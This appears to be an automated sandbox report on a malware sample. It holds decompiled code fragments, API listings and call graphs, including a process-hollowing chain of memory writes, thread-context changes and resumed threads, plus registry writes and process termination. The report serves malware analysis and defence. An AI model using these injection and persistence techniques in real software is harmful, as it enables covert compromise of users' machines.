    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    Function 0040BC54, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
    C-Code - Quality: 83%
    			E0040BC54(void* __edx) {
				void* _t6;
				void* _t13;
				void* _t17;
				void* _t20;
				void* _t21;
				void* _t22;

				_t17 = __edx;
				if(__edx != 0) {
					_t22 = _t22 + 0xfffffff0;
					_t6 = E00403404(_t6, _t21);
				}
				_t20 = _t6;
				E004030E4(0);
				 *((intOrPtr*)(_t20 + 0xc)) = 0xffff;
				 *((intOrPtr*)(_t20 + 0x10)) = CreateEventA(0, 0xffffffff, 0xffffffff, 0);
				 *((intOrPtr*)(_t20 + 0x14)) = CreateEventA(0, 0, 0, 0);
				 *(_t20 + 0x18) = 0xffffffff;
				 *((intOrPtr*)(_t20 + 0x20)) = E004030E4(1);
				_t13 = _t20;
				if(_t17 != 0) {
					E0040345C(_t13);
					_pop( *[fs:0x0]);
				}
				return _t20;
			}









    0x0040bc54
    0x0040bc58
    0x0040bc5a
    0x0040bc5d
    0x0040bc5d
    0x0040bc64
    0x0040bc6a
    0x0040bc6f
    0x0040bc83
    0x0040bc93
    0x0040bc96
    0x0040bca9
    0x0040bcac
    0x0040bcb0
    0x0040bcb2
    0x0040bcb7
    0x0040bcbe
    0x0040bcc5

    APIs
    • CreateEventA.KERNEL32(00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC7E
    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC8E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 004179B4, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 9
    C-Code - Quality: 100%
    			E004179B4(void* __eax) {
				void* _t3;

				L0040C518();
				if(__eax != 0) {
					_t3 = E0040A56C("WSACleanup", 1);
					E0040386C();
					return _t3;
				}
				return __eax;
			}




    0x004179b4
    0x004179bb
    0x004179c9
    0x004179ce
    0x00000000
    0x004179ce
    0x004179d3

    APIs
    • WSACleanup.WSOCK32(00417A06,00000000,00417A14), ref: 004179B4
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 0040F0A8, Relevance: 5.1, Strings: 4, Instructions: 85
    C-Code - Quality: 78%
    			E0040F0A8(signed int __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				void* _v8;
				char _v264;
				char _v520;
				char _v524;
				signed char _t47;
				intOrPtr* _t59;
				intOrPtr _t61;
				intOrPtr* _t75;
				void* _t78;

				_v524 = 0;
				_t75 = __edx;
				_t47 = __eax;
				_push(_t78);
				_push(0x40f1ce);
				_push( *[fs:eax]);
				 *[fs:eax] = _t78 + 0xfffffdf8;
				_t73 = __eax & 0x00000fff;
				if((__eax & 0x00000fff) > 0x14) {
					if(__eax != 0x100) {
						if(__eax != 0x101) {
							if(E0040F504(__eax,  &_v8) == 0) {
								E00407110( &_v524, 4);
								_t59 =  *0x4530ec; // 0x419128
								E00404194(_t75, _v524,  *_t59);
							} else {
								E00403064( *_v8,  &_v520);
								E004027B4( &_v520, 0x7fffffff, 2,  &_v264);
								E004040EC(__edx,  &_v264);
							}
						} else {
							E00403EDC(__edx, 0x40f1f4);
						}
					} else {
						E00403EDC(__edx, "String");
					}
				} else {
					E00403EDC(__edx,  *((intOrPtr*)(0x419358 + (_t73 & 0x0000ffff) * 4)));
				}
				if((_t47 & 0x00000020) != 0) {
					E00404194(_t75,  *_t75, "Array ");
				}
				if((_t47 & 0x00000040) != 0) {
					E00404194(_t75,  *_t75, "ByRef ");
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(E0040F1D5);
				return E00403E88( &_v524);
			}












    0x0040f0b6
    0x0040f0bc
    0x0040f0be
    0x0040f0c2
    0x0040f0c3
    0x0040f0c8
    0x0040f0cb
    0x0040f0d0
    0x0040f0d9
    0x0040f0f6
    0x0040f10e
    0x0040f12a
    0x0040f175
    0x0040f180
    0x0040f18a
    0x0040f12c
    0x0040f13e
    0x0040f153
    0x0040f160
    0x0040f160
    0x0040f110
    0x0040f117
    0x0040f117
    0x0040f0f8
    0x0040f0ff
    0x0040f0ff
    0x0040f0db
    0x0040f0e7
    0x0040f0e7
    0x0040f192
    0x0040f19d
    0x0040f19d
    0x0040f1a5
    0x0040f1b0
    0x0040f1b0
    0x0040f1b7
    0x0040f1ba
    0x0040f1bd
    0x0040f1cd

    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 0041381C, Relevance: 5.1, Strings: 4, Instructions: 71
    C-Code - Quality: 82%
    			E0041381C(intOrPtr __eax, void* __ebx, char* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				char* _t15;
				char* _t23;
				intOrPtr _t30;
				char _t31;
				intOrPtr _t39;
				intOrPtr _t42;
				void* _t45;

				_v12 = 0;
				_t23 = __edx;
				_push(_t45);
				_push(0x4138c2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t45 + 0xfffffff8;
				_v8 = 0;
				if(__edx != 0) {
					_t39 = __eax;
					while( *_t23 != 0) {
						_t15 = _t23;
						while(1) {
							_t31 =  *_t23;
							if(_t31 == 0 || _t31 + 0xd3 - 2 < 0) {
								break;
							}
							_t23 = _t23 + 1;
						}
						E00403F78( &_v12, _t23 - _t15, _t15);
						_t42 = E004165D4(_t39, _t23 - _t15, _v12);
						if(_t42 == 0 && E00406E50(_v12, 0x4138dc) != 0) {
							_t42 = _t39;
						}
						if(_t42 != 0) {
							if( *_t23 == 0x2e) {
								_t23 = _t23 + 1;
							}
							if( *_t23 == 0x2d) {
								_t23 = _t23 + 1;
							}
							if( *_t23 == 0x3e) {
								_t23 = _t23 + 1;
							}
							_t39 = _t42;
							continue;
						}
						goto L19;
					}
					_v8 = _t39;
				}
				L19:
				_pop(_t30);
				 *[fs:eax] = _t30;
				_push(E004138C9);
				return E00403E88( &_v12);
			}












    0x00413827
    0x0041382a
    0x00413830
    0x00413831
    0x00413836
    0x00413839
    0x0041383e
    0x00413843
    0x00413845
    0x004138a4
    0x00413849
    0x0041384e
    0x0041384e
    0x00413852
    0x00000000
    0x00000000
    0x0041384d
    0x0041384d
    0x00413864
    0x00413873
    0x00413877
    0x0041388a
    0x0041388a
    0x0041388e
    0x00413893
    0x00413895
    0x00413895
    0x00413899
    0x0041389b
    0x0041389b
    0x0041389f
    0x004138a1
    0x004138a1
    0x004138a2
    0x00000000
    0x004138a2
    0x00000000
    0x0041388e
    0x004138a9
    0x004138a9
    0x004138ac
    0x004138ae
    0x004138b1
    0x004138b4
    0x004138c1

    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 0041498C, Relevance: 5.0, Strings: 4, Instructions: 50
    C-Code - Quality: 96%
    			E0041498C(void* __eax, void* __ecx, void* __edx) {
				signed int _t7;
				void* _t8;
				void* _t17;
				void* _t29;

				_push(__ecx);
				_t29 = __edx;
				_t17 = __eax;
				_t7 = E004155CC(__ecx) & 0x0000007f;
				if(_t7 > 0xd) {
					L7:
					_t8 = E00413A2C();
				} else {
					_t1 = _t7 + E004149B3; // 0x5
					switch( *((intOrPtr*)( *_t1 * 4 +  &M004149C1))) {
						case 0:
							goto L7;
						case 1:
							E00413F54(_t17, 1, _t30);
							E00403F78(_t29,  *_t30, 0);
							_t8 = E00413F54(_t17,  *_t30, E004043A0(_t29));
							goto L8;
						case 2:
							__eax = __esi;
							__edx = 0x414a58;
							__eax = E00403EDC(__esi, 0x414a58);
							goto L8;
						case 3:
							__eax = __esi;
							__edx = 0x414a68;
							__eax = E00403EDC(__esi, 0x414a68);
							goto L8;
						case 4:
							__eax = __esi;
							__edx = 0x414a78;
							__eax = E00403EDC(__esi, 0x414a78);
							goto L8;
						case 5:
							__eax = __esi;
							__edx = 0x414a84;
							__eax = E00403EDC(__esi, 0x414a84);
							goto L8;
					}
				}
				L8:
				return _t8;
			}







    0x0041498e
    0x0041498f
    0x00414991
    0x0041499a
    0x004149a0
    0x00414a44
    0x00414a44
    0x004149a6
    0x004149a6
    0x004149ac
    0x00000000
    0x00000000
    0x00000000
    0x004149e2
    0x004149f0
    0x00414a05
    0x00000000
    0x00000000
    0x00414a0c
    0x00414a0e
    0x00414a13
    0x00000000
    0x00000000
    0x00414a1a
    0x00414a1c
    0x00414a21
    0x00000000
    0x00000000
    0x00414a28
    0x00414a2a
    0x00414a2f
    0x00000000
    0x00000000
    0x00414a36
    0x00414a38
    0x00414a3d
    0x00000000
    0x00000000
    0x004149ac
    0x00414a49
    0x00414a4c

    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 0040AC28, Relevance: 5.0, Strings: 4, Instructions: 28
    C-Code - Quality: 100%
    			E0040AC28() {
				intOrPtr* _t5;
				intOrPtr* _t6;
				intOrPtr* _t7;
				intOrPtr* _t8;
				intOrPtr* _t9;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t16;
				intOrPtr* _t17;
				intOrPtr* _t18;

				_t12 =  *0x452f70; // 0x405e70
				 *0x45478c = E0040A628(_t12, 1);
				_t13 =  *0x453040; // 0x405ef0
				 *0x454790 = E0040A628(_t13, 1);
				_t5 =  *0x452f34; // 0x454008
				 *_t5 = 0x40a7a4;
				_t6 =  *0x452fa8; // 0x454004
				 *_t6 = E0040AC18;
				_t7 =  *0x452f64; // 0x45401c
				_t16 =  *0x406188; // 0x4061d4
				 *_t7 = _t16;
				_t8 =  *0x452f98; // 0x45400c
				 *_t8 = E0040A968;
				_t9 =  *0x452fac; // 0x454010
				 *_t9 = E0040AB4C;
				_t17 =  *0x453054; // 0x454020
				 *_t17 = E0040A8B4;
				_t18 =  *0x452f24; // 0x454028
				 *_t18 = E0040A8D0;
				return E0040A8D0;
			}













    0x0040ac28
    0x0040ac3a
    0x0040ac3f
    0x0040ac51
    0x0040ac56
    0x0040ac5b
    0x0040ac61
    0x0040ac66
    0x0040ac6c
    0x0040ac71
    0x0040ac77
    0x0040ac79
    0x0040ac7e
    0x0040ac84
    0x0040ac89
    0x0040ac94
    0x0040ac9a
    0x0040aca1
    0x0040aca7
    0x0040aca9

    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd

    Analysis Process: obtG43AWHP.exe PID: 3132 Parent PID: 3120

    Execution Graph

    Execution Coverage:2.6%
    Dynamic/Decrypted Code Coverage:100%
    Signature Coverage:45.8%
    Total number of Nodes:24
    Total number of Limit Nodes:5

    Graph

    %3 14819 29e590 14820 29e5ac 14819->14820 14822 29f46c 14820->14822 14825 29e510 14822->14825 14829 29e53c 14825->14829 14826 29e57e 14827 29e542 GetFileAttributesA 14827->14829 14829->14826 14829->14827 14830 29e380 14829->14830 14831 29e453 14830->14831 14832 29e45f CreateWindowExA 14831->14832 14833 29e45a 14831->14833 14832->14833 14834 29e4a0 PostMessageA 14832->14834 14833->14829 14835 29e4bf 14834->14835 14835->14833 14837 29e080 VirtualAlloc GetModuleFileNameA 14835->14837 14838 29e368 14837->14838 14839 29e0ed CreateProcessA 14837->14839 14838->14835 14839->14838 14841 29e1cc VirtualAlloc 14839->14841 14843 29e20e 14841->14843 14843->14838 14844 29e216 ReadProcessMemory 14843->14844 14845 29e242 14844->14845 14846 29e252 VirtualAllocEx NtWriteVirtualMemory 14844->14846 14845->14846 14849 29e2a8 14846->14849 14847 29e2bd NtWriteVirtualMemory 14847->14849 14848 29e30a WriteProcessMemory SetThreadContext ResumeThread 14848->14838 14849->14847 14849->14848

    Executed Functions

    Function 0029E080, Relevance: 16.7, APIs: 11, Instructions: 244
    APIs
    • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0029E0C6
    • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0029E0DC
    • CreateProcessA.KERNEL32(?,00000000), ref: 0029E1C2
    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0029E1F0
    • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0029E235
    • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 0029E271
    • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0029E297
    • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 0029E306
    • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0029E32C
    • SetThreadContext.KERNEL32(00000000,?), ref: 0029E34E
    • ResumeThread.KERNELBASE(00000000), ref: 0029E35A
    Memory Dump Source
    • Source File: 00000003.00000002.1468917605.0029D000.00000040.sdmp, Offset: 0029D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_29d000_obtG43AWHP.jbxd
    Function 0029E380, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
    APIs
    • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0029E493
    • PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0029E4B6
      • Part of subcall function 0029E080: VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0029E0C6
      • Part of subcall function 0029E080: GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0029E0DC
      • Part of subcall function 0029E080: CreateProcessA.KERNEL32(?,00000000), ref: 0029E1C2
      • Part of subcall function 0029E080: VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0029E1F0
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1468917605.0029D000.00000040.sdmp, Offset: 0029D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_29d000_obtG43AWHP.jbxd
    Function 0029E510, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
    APIs
    • GetFileAttributesA.KERNELBASE(apfHQ), ref: 0029E54C
      • Part of subcall function 0029E380: CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0029E493
      • Part of subcall function 0029E380: PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0029E4B6
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1468917605.0029D000.00000040.sdmp, Offset: 0029D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_29d000_obtG43AWHP.jbxd

    Non-executed Functions

    Function 0029DFB2, Relevance: .1, Instructions: 61
    Memory Dump Source
    • Source File: 00000003.00000002.1468917605.0029D000.00000040.sdmp, Offset: 0029D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_29d000_obtG43AWHP.jbxd

    Analysis Process: obtG43AWHP.exe PID: 3156 Parent PID: 3132

    Execution Graph

    Execution Coverage:2%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:5%
    Total number of Nodes:622
    Total number of Limit Nodes:8

    Graph

    %3 13303 418c78 13330 405adc GetModuleHandleA 13303->13330 13308 418cf0 13350 418750 13308->13350 13314 418cc6 13314->13308 13316 4029a4 36 API calls 13314->13316 13318 418ce2 13316->13318 13320 418cea DeleteFileA 13318->13320 13320->13308 13325 418d04 13326 418570 43 API calls 13325->13326 13327 418d35 ResumeThread 13325->13327 13328 4189e8 3 API calls 13325->13328 13434 4189e8 PeekMessageA 13325->13434 13440 418590 SuspendThread 13325->13440 13326->13325 13327->13325 13329 418d25 Sleep 13328->13329 13329->13325 13331 405b0f 13330->13331 13446 403b78 13331->13446 13334 402944 GetCommandLineA 13697 402858 13334->13697 13336 402968 13337 402858 34 API calls 13336->13337 13338 40297f 13336->13338 13337->13336 13339 403e88 11 API calls 13338->13339 13340 402994 13339->13340 13340->13308 13341 4029a4 13340->13341 13342 403e88 11 API calls 13341->13342 13343 4029b8 13342->13343 13344 4029bc GetModuleFileNameA 13343->13344 13345 4029da GetCommandLineA 13343->13345 13347 403f78 25 API calls 13344->13347 13346 4029e1 13345->13346 13348 402858 34 API calls 13346->13348 13349 4029d8 13346->13349 13347->13349 13348->13346 13349->13314 13351 418758 13350->13351 13351->13351 13352 402944 35 API calls 13351->13352 13353 418776 13352->13353 13354 4187a4 13353->13354 13355 41877a 13353->13355 13357 4029a4 36 API calls 13354->13357 13356 4029a4 36 API calls 13355->13356 13358 41878d 13356->13358 13359 4187bf 13357->13359 13361 418795 ShellExecuteA 13358->13361 13719 407138 13359->13719 13363 403d1c 7 API calls 13361->13363 13363->13354 13364 4188db 13370 41891b 13364->13370 13723 406ffc 13364->13723 13365 4187d2 13727 417d84 13365->13727 13777 403eac 13370->13777 13373 4188f1 13377 4029a4 36 API calls 13373->13377 13379 418904 13377->13379 13378 417d84 27 API calls 13380 4187ff 13378->13380 13381 41890c ShellExecuteA 13379->13381 13382 406efc 25 API calls 13380->13382 13383 403d1c 7 API calls 13381->13383 13384 418810 13382->13384 13383->13370 13758 4185e8 13384->13758 13387 4029a4 36 API calls 13388 418823 13387->13388 13389 406efc 25 API calls 13388->13389 13390 41882e 13389->13390 13391 406efc 25 API calls 13390->13391 13392 41883f 13391->13392 13393 417d84 27 API calls 13392->13393 13394 41884a 13393->13394 13395 4188aa 13394->13395 13396 418855 13394->13396 13398 406ffc 25 API calls 13395->13398 13397 406ffc 25 API calls 13396->13397 13399 418866 13397->13399 13401 4188bb 13398->13401 13400 4029a4 36 API calls 13399->13400 13402 418878 13400->13402 13404 4188cc ShellExecuteA 13401->13404 13768 404208 13402->13768 13406 4188d6 13404->13406 13407 403d1c 7 API calls 13406->13407 13407->13364 13409 418a14 13904 417828 13409->13904 13411 418a3d 13412 406efc 25 API calls 13411->13412 13413 418a4c 13412->13413 13908 417750 13413->13908 13416 406efc 25 API calls 13417 418a63 13416->13417 13914 4177bc 13417->13914 13419 418a6d 13420 418a78 13419->13420 13421 418aa4 Sleep 13419->13421 13920 417318 13420->13920 13421->13419 13424 403edc 25 API calls 13425 418a94 13424->13425 13426 403eac 11 API calls 13425->13426 13427 418aca 13426->13427 13428 418540 13427->13428 14019 403e44 13428->14019 13430 418558 13431 418b90 13430->13431 13432 403e44 26 API calls 13431->13432 13433 418ba8 13432->13433 13433->13325 13435 418a03 TranslateMessage DispatchMessageA 13434->13435 13436 418a0f Sleep 13434->13436 13435->13436 13437 418570 13436->13437 14026 41839c 13437->14026 13441 4185c3 13440->13441 14071 418560 13441->14071 13444 4185e3 13444->13325 13445 4185cc OpenProcess TerminateProcess 13445->13444 13447 403bab 13446->13447 13450 403b18 13447->13450 13451 403b54 13450->13451 13452 403b27 13450->13452 13451->13334 13452->13451 13456 404d84 13452->13456 13460 402670 13452->13460 13466 405824 13452->13466 13457 404d94 GetModuleFileNameA 13456->13457 13459 404db0 13456->13459 13472 404fc0 GetModuleFileNameA RegOpenKeyExA 13457->13472 13459->13452 13461 402675 13460->13461 13462 402688 13460->13462 13511 40209c 13461->13511 13462->13452 13463 40267b 13463->13462 13522 402778 13463->13522 13467 405834 13466->13467 13468 405865 13466->13468 13467->13468 13674 404dcc 13467->13674 13468->13452 13470 405854 LoadStringA 13679 403f78 13470->13679 13473 405003 RegOpenKeyExA 13472->13473 13474 405043 13472->13474 13473->13474 13475 405021 RegOpenKeyExA 13473->13475 13490 404e08 GetModuleHandleA 13474->13490 13475->13474 13477 4050cc lstrcpyn GetThreadLocale GetLocaleInfoA 13475->13477 13479 4051e6 13477->13479 13480 405103 13477->13480 13479->13459 13480->13479 13483 405113 lstrlen 13480->13483 13481 405088 RegQueryValueExA 13482 4050a6 RegCloseKey 13481->13482 13482->13459 13485 40512b 13483->13485 13485->13479 13486 405150 lstrcpyn LoadLibraryExA 13485->13486 13487 405178 13485->13487 13486->13487 13487->13479 13488 405182 lstrcpyn LoadLibraryExA 13487->13488 13488->13479 13489 4051b4 lstrcpyn LoadLibraryExA 13488->13489 13489->13479 13491 404e30 GetProcAddress 13490->13491 13493 404e70 13490->13493 13492 404e41 13491->13492 13491->13493 13492->13493 13499 404e57 lstrcpyn 13492->13499 13495 404f92 RegQueryValueExA 13493->13495 13503 404ea3 13493->13503 13507 404df4 13493->13507 13494 404eb6 lstrcpyn 13501 404ed4 13494->13501 13495->13481 13495->13482 13498 404f7e lstrcpyn 13498->13495 13499->13495 13500 404df4 CharNextA 13500->13501 13501->13495 13501->13498 13501->13500 13504 404ef3 lstrcpyn FindFirstFileA 13501->13504 13502 404df4 CharNextA 13502->13503 13503->13494 13503->13495 13504->13495 13505 404f1e FindClose lstrlen 13504->13505 13505->13495 13506 404f3d lstrcpyn lstrlen 13505->13506 13506->13501 13508 404dfc 13507->13508 13509 404e07 13508->13509 13510 404df6 CharNextA 13508->13510 13509->13495 13509->13502 13510->13508 13512 4020b0 13511->13512 13515 4020b5 13511->13515 13528 4019b0 RtlInitializeCriticalSection 13512->13528 13514 4020e2 RtlEnterCriticalSection 13516 4020ec 13514->13516 13515->13514 13515->13516 13517 4020c1 13515->13517 13516->13517 13535 401fa8 13516->13535 13517->13463 13520 40220d RtlLeaveCriticalSection 13521 402217 13520->13521 13521->13463 13523 40272c 13522->13523 13525 402751 13523->13525 13637 405a90 13523->13637 13645 402720 13525->13645 13529 4019d4 RtlEnterCriticalSection 13528->13529 13530 4019de 13528->13530 13529->13530 13531 4019fc LocalAlloc 13530->13531 13534 401a16 13531->13534 13532 401a5b RtlLeaveCriticalSection 13533 401a65 13532->13533 13533->13515 13534->13532 13534->13533 13536 401fb8 13535->13536 13537 401fe4 13536->13537 13540 402008 13536->13540 13541 401f1c 13536->13541 13537->13540 13546 401dbc 13537->13546 13540->13520 13540->13521 13550 401770 13541->13550 13543 401f2c 13545 401f39 13543->13545 13559 401e90 13543->13559 13545->13536 13547 401e11 13546->13547 13548 401dda 13546->13548 13547->13548 13601 401d0c 13547->13601 13548->13540 13554 40178c 13550->13554 13552 401796 13566 40165c 13552->13566 13554->13552 13556 4017e7 13554->13556 13558 4017a2 13554->13558 13570 4014c8 13554->13570 13578 4013c4 13554->13578 13582 4015a4 13556->13582 13558->13543 13589 401e44 13559->13589 13562 4013c4 LocalAlloc 13563 401eb4 13562->13563 13564 401ebc 13563->13564 13593 401be8 13563->13593 13564->13545 13568 4016a2 13566->13568 13567 4016d2 13567->13558 13568->13567 13569 4016be VirtualAlloc 13568->13569 13569->13567 13569->13568 13571 4014d7 VirtualAlloc 13570->13571 13573 401527 13571->13573 13574 401504 13571->13574 13573->13554 13586 40137c 13574->13586 13577 401514 VirtualFree 13577->13573 13579 4013e0 13578->13579 13580 40137c LocalAlloc 13579->13580 13581 401426 13580->13581 13581->13554 13584 4015d3 13582->13584 13583 40162c 13583->13558 13584->13583 13585 401600 VirtualFree 13584->13585 13585->13584 13587 401324 LocalAlloc 13586->13587 13588 401387 13587->13588 13588->13573 13588->13577 13590 401e56 13589->13590 13591 401e4d 13589->13591 13590->13562 13591->13590 13598 401c18 13591->13598 13594 401bf6 13593->13594 13596 401c05 13593->13596 13595 401dbc 9 API calls 13594->13595 13597 401c03 13595->13597 13596->13564 13597->13564 13599 40222c 9 API calls 13598->13599 13600 401c39 13599->13600 13600->13590 13602 401d22 13601->13602 13603 401d61 13602->13603 13604 401d4d 13602->13604 13613 401daa 13602->13613 13606 401924 3 API calls 13603->13606 13614 401924 13604->13614 13607 401d5f 13606->13607 13608 401be8 9 API calls 13607->13608 13607->13613 13609 401d85 13608->13609 13610 401d9f 13609->13610 13624 401c3c 13609->13624 13629 401434 13610->13629 13613->13548 13615 40194a 13614->13615 13617 4019a3 13614->13617 13633 4016f0 13615->13633 13617->13607 13619 4013c4 LocalAlloc 13620 401967 13619->13620 13621 4015a4 VirtualFree 13620->13621 13622 40197e 13620->13622 13621->13622 13622->13617 13623 401434 LocalAlloc 13622->13623 13623->13617 13625 401c41 13624->13625 13627 401c4f 13624->13627 13626 401c18 9 API calls 13625->13626 13628 401c4e 13626->13628 13627->13610 13628->13610 13630 40143f 13629->13630 13631 40137c LocalAlloc 13630->13631 13632 40145a 13630->13632 13631->13632 13632->13613 13635 401727 13633->13635 13634 401767 13634->13619 13635->13634 13636 401741 VirtualFree 13635->13636 13636->13635 13638 405ac5 TlsGetValue 13637->13638 13639 405a9f 13637->13639 13640 405aaa 13638->13640 13641 405acf 13638->13641 13639->13525 13648 405a4c 13640->13648 13641->13525 13643 405aaf TlsGetValue 13644 405abe 13643->13644 13644->13525 13655 403df4 13645->13655 13650 405a52 13648->13650 13649 405a76 13649->13643 13650->13649 13654 405a38 LocalAlloc 13650->13654 13652 405a72 13652->13649 13653 405a82 TlsSetValue 13652->13653 13653->13649 13654->13652 13658 403d1c 13655->13658 13660 403d35 13658->13660 13659 403d54 13668 403c90 13659->13668 13660->13659 13663 403d65 13660->13663 13662 403d5e 13662->13663 13664 403da6 13663->13664 13665 403da0 FreeLibrary 13663->13665 13666 403ddb 13664->13666 13667 403dd3 ExitProcess 13664->13667 13665->13664 13669 403cf1 13668->13669 13673 403c9a GetStdHandle WriteFile GetStdHandle WriteFile 13668->13673 13671 403cfa MessageBoxA 13669->13671 13672 403d0d 13669->13672 13671->13672 13672->13662 13673->13662 13675 404df3 13674->13675 13678 404dd6 13674->13678 13675->13470 13676 404d84 30 API calls 13677 404dec 13676->13677 13677->13470 13678->13675 13678->13676 13684 403f4c 13679->13684 13681 403f88 13689 403e88 13681->13689 13685 403f74 13684->13685 13686 403f50 13684->13686 13685->13681 13687 402670 25 API calls 13686->13687 13688 403f5d 13687->13688 13688->13681 13690 403ea9 13689->13690 13691 403e8e 13689->13691 13690->13468 13691->13690 13693 402690 13691->13693 13694 4026a8 13693->13694 13695 402695 13693->13695 13694->13690 13695->13694 13696 402778 11 API calls 13695->13696 13696->13694 13700 40286a 13697->13700 13698 402862 CharNextA 13698->13700 13699 402884 13701 4028d3 13699->13701 13702 40288e CharNextA 13699->13702 13703 4028bf CharNextA 13699->13703 13706 4028b5 CharNextA 13699->13706 13707 402898 CharNextA 13699->13707 13700->13698 13700->13699 13713 404478 13701->13713 13702->13699 13703->13699 13705 40293b 13705->13336 13706->13699 13707->13699 13708 4028e8 CharNextA 13710 4028dc 13708->13710 13709 402920 CharNextA 13709->13710 13710->13705 13710->13708 13710->13709 13711 402916 CharNextA 13710->13711 13712 4028f2 CharNextA 13710->13712 13711->13710 13712->13710 13714 404485 13713->13714 13718 4044b5 13713->13718 13716 403f4c 25 API calls 13714->13716 13717 404491 13714->13717 13715 403e88 11 API calls 13715->13717 13716->13718 13717->13710 13718->13715 13721 407148 13719->13721 13720 407169 13720->13364 13720->13365 13721->13720 13781 406d40 13721->13781 13724 40700c 13723->13724 13725 403f78 25 API calls 13724->13725 13726 407014 13725->13726 13726->13373 13847 404348 13727->13847 13730 404478 25 API calls 13731 417dba 13730->13731 13732 417dca ExpandEnvironmentStringsA 13731->13732 13733 406efc 25 API calls 13732->13733 13734 417dda 13733->13734 13735 403edc 25 API calls 13734->13735 13736 417de4 13735->13736 13737 403e88 11 API calls 13736->13737 13738 417df9 13737->13738 13739 4186d0 13738->13739 13740 4186e4 13739->13740 13849 40760c 13740->13849 13744 418705 13745 4029a4 36 API calls 13744->13745 13746 41871a 13745->13746 13747 418722 CopyFileA 13746->13747 13748 418735 13747->13748 13749 403eac 11 API calls 13748->13749 13750 418742 13749->13750 13751 406efc 13750->13751 13752 406f0b 13751->13752 13753 406f24 13752->13753 13754 406f2d 13752->13754 13755 403e88 11 API calls 13753->13755 13757 4043a8 25 API calls 13754->13757 13756 406f2b 13755->13756 13756->13378 13757->13756 13759 418602 13758->13759 13760 41860a RegOpenKeyExA 13759->13760 13761 41863a 13760->13761 13762 41865c RegSetValueExA RegCloseKey 13761->13762 13763 41867c 13762->13763 13764 403e88 11 API calls 13763->13764 13765 418684 13764->13765 13766 403eac 11 API calls 13765->13766 13767 418691 13766->13767 13767->13387 13769 404219 13768->13769 13770 40423f 13769->13770 13771 404256 13769->13771 13772 404478 25 API calls 13770->13772 13773 403f4c 25 API calls 13771->13773 13774 40424c 13772->13774 13773->13774 13775 404287 13774->13775 13776 403edc 25 API calls 13774->13776 13776->13775 13779 403eb2 13777->13779 13778 403ed8 13778->13409 13779->13778 13780 402690 11 API calls 13779->13780 13780->13779 13784 40a664 13781->13784 13783 406d59 